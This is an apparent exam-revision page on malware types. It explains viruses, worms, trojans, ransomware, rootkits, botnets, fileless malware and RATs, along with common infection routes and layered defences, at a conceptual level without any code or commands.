cyber revision

Malware types

Viruses, worms, trojans, ransomware, rootkits and the rest: classified by how they spread and what they do.

~4 min read

Two questions to classify any malware

Malware (malicious software) is any program written to harm, exploit or gain unauthorised access. The zoo of names becomes manageable if you ask two questions of each sample: how does it spread? and what does it do? Many real samples are blends (a "worm that drops ransomware"), so the categories describe behaviours, not rigid boxes.

Classified by how it spreads

A virus attaches itself to a legitimate file or program and requires a user to run the host file to execute and spread. Like a biological virus, it needs a host and an action to propagate (opening the infected document, running the program).

A worm is self-propagating: it spreads across networks with no user interaction, by exploiting vulnerabilities. This autonomy is why worms cause explosive, large-scale outbreaks: WannaCry (2017) wormed through the SMB EternalBlue vulnerability and hit hundreds of thousands of machines in days. The distinction "virus needs a user, worm doesn't" is a guaranteed exam question.

A trojan disguises itself as something legitimate and desirable (a cracked game, a fake update, an email attachment) to trick the user into running it. It doesn't self-replicate; it relies on deception, and is often the initial foothold that delivers other malware.

Classified by what it does

Ransomware encrypts the victim's files and demands payment for the key. Now usually double extortion: data is stolen first, then encrypted, so victims who restore from backup are still threatened with publication (defeating "we have backups" as a complete answer). The dominant criminal threat to organisations, frequently sold as ransomware-as-a-service.

Spyware covertly gathers information: browsing, files, credentials. Keyloggers are a focused form, recording keystrokes to capture passwords. Infostealers are a booming category that grab saved passwords, cookies and crypto wallets and sell them.

Adware bombards the user with ads and is often bundled with legitimate software, sometimes acting as a spyware vector. More nuisance than catastrophe, but a sign of poor hygiene.

A rootkit hides the attacker's presence by subverting the operating system itself, intercepting system calls so infected files and processes don't appear in normal listings. Kernel- or firmware-level rootkits are extremely hard to detect and remove, sometimes surviving an OS reinstall. The defensive answer is often to rebuild from known-good media and verify boot integrity (Secure Boot, TPM).

A bootkit is a rootkit that infects the boot process, loading before the OS and its defences.

A backdoor provides a hidden method of bypassing normal authentication to regain access later. Often installed after initial compromise to ensure persistence.

Bot / botnet malware enrols the machine into a network of compromised devices (bots/zombies) under a central command and control server. Botnets power DDoS, spam and credential stuffing, and rent themselves out.

A logic bomb is dormant code that triggers on a condition (a date, a user being removed from payroll). Associated with malicious insiders.

Fileless malware runs in memory using legitimate system tools (PowerShell, WMI) rather than writing a malicious file to disk, a technique called living off the land. It evades file-scanning antivirus, which is part of why detection has shifted toward behaviour rather than signatures.

RAT and stagers

A RAT (Remote Access Trojan) gives the attacker interactive remote control (files, webcam, keystrokes, command execution). Modern malware is frequently multi-stage: a small dropper/loader gets in first, then pulls down the heavier payload from a C2 server, which makes the initial artefact small and the final payload easy to swap.

How malware gets in

  • Phishing email: by far the most common delivery (attachment or link). Social engineering, next chapter.
  • Drive-by download: a compromised or malicious website exploiting the browser.
  • Removable media: USB drives (how Stuxnet crossed air gaps).
  • Software supply chain: trojanised legitimate software or a poisoned dependency/update (OWASP A03).
  • Exploiting exposed services: worms and automated attacks against unpatched internet-facing systems.
  • Malvertising: malware delivered through ad networks.

Defence in summary

No single control stops everything, so layer them: keep systems patched (closes the holes worms and exploits use), run EDR/antivirus that detects by behaviour not just signatures, enforce least privilege (limits what malware can do once running), filter email and web, take offline/immutable backups (the real answer to ransomware availability loss), train users against phishing, and segment networks to stop a worm or ransomware spreading. Application allowlisting and disabling macros remove common execution paths entirely.

Quick recall

  • Spread: virus (needs a user to run a host file), worm (self-propagates over the network, no user), trojan (disguised, relies on deception).
  • Payload: ransomware (encrypt + now double-extort), spyware/keylogger/infostealer (steal info), rootkit/bootkit (hide presence, OS/boot-level), backdoor (persistent re-entry), bot (joins a botnet), logic bomb (condition-triggered), fileless (in-memory, living off the land).
  • RATs give remote control; modern malware is multi-stage (dropper → payload from C2).
  • Entry: phishing (most common), drive-by, USB, supply chain, exposed unpatched services.
  • Defence is layered: patch, behaviour-based EDR, least privilege, offline backups, email/web filtering, user training, segmentation.
PreviousNext